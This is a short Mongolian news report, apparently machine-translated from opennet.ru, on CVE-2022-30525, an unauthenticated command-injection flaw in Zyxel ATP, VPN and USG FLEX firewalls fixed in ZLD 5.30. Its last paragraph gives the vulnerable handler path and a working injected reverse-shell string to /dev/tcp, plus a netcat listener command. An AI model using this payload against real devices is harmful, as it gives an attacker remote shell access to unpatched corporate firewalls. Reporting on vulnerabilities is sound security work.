Zyxel галт хананд байгаа эмзэг байдал нь кодыг баталгаажуулахгүйгээр гүйцэтгэх боломжийг олгодог

Аж ахуйн нэгжүүдэд галт хана, IDS болон VPN-ийн ажиллагааг зохион байгуулахад зориулагдсан ATP, VPN болон USG FLEX цувралын Zyxel төхөөрөмжүүдэд чухал эмзэг байдал (CVE-2022-30525) илэрсэн бөгөөд энэ нь гадны халдагчдад код гүйцэтгэх боломжийг олгодог. баталгаажуулалтгүйгээр хэрэглэгчийн эрхгүй төхөөрөмж. Халдлага үйлдэхийн тулд халдагчид HTTP/HTTPS протокол ашиглан төхөөрөмж рүү хүсэлт илгээх боломжтой байх ёстой. Zyxel нь ZLD 5.30 програм хангамжийн шинэчлэлтийн эмзэг байдлыг зассан. Shodan үйлчилгээний мэдээлснээр, одоогоор дэлхийн сүлжээнд HTTP/HTTPS-ээр дамжуулан хүсэлтийг хүлээн авдаг 16213 эмзэг төхөөрөмж байна.

Үйл ажиллагаа нь вэб зохицуулагч /ztp/cgi-bin/handler руу тусгайлан боловсруулсан командуудыг илгээх замаар хийгддэг бөгөөд баталгаажуулалтгүйгээр хандах боломжтой. Асуудал нь lib_wan_settings.py номын санд ашигладаг os.system дуудлагыг ашиглан систем дээр командуудыг гүйцэтгэх үед хүсэлтийн параметрүүдийг зохих ёсоор цэвэрлээгүйгээс үүдэлтэй бөгөөд setWanPortSt үйлдлийг боловсруулах үед хийгддэг.

Жишээлбэл, халдагч мөрийг дамжуулж болно "; ping 192.168.1.210;" Энэ нь систем дээрх "ping 192.168.1.210" командыг гүйцэтгэхэд хүргэнэ. Командын бүрхүүлд хандахын тулд та систем дээрээ “nc -lvnp 1270”-г ажиллуулж, дараа нь төхөөрөмж рүү '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

Эх сурвалж: opennet.ru

сэтгэгдэл нэмэх